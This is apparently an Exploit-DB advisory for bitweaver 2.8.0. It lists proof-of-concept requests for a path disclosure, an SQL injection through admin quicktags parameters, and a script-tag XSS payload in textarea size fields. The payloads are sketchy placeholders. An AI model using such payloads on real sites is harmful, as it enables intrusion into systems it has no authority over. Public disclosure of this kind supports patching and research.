bitweaver 2.8.0 - Multiple Vulnerabilities

2011-03-02T00:00:00
ID EDB-ID:16267
Type exploitdb
Reporter lemlajt
Modified 2011-03-02T00:00:00

Description

bitweaver 2.8.0 - Multiple Vulnerabilities. Webapps exploit for php platform

                                        
                                            # exploit title: Path Disclosure bitweaver 2.8
# date: 25.o2.2o11
# author: lemlajt
# software : bitweaver
# version: 2.8
# tested on: linux
# cve :
#

Path Disclosure bitweaver 2.8
PoC :
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/kernel/admin/index.php?page=%27

sql injection in bitweaver 2.8
PoC :
1. Goto:
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/quicktags/admin/admin_quicktags.php?format_guid=tikiwiki&sort_mode=tagpos_asc

2. Data Tamper:
$find = ' sql
$sort_mode =
$format_guid =
$list_page =


bonus: xss
POST
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/kernel/admin/index.php
?
$liberty_textarea_height = "><...>
$liberty_textarea_width = "><script>here</script>

# *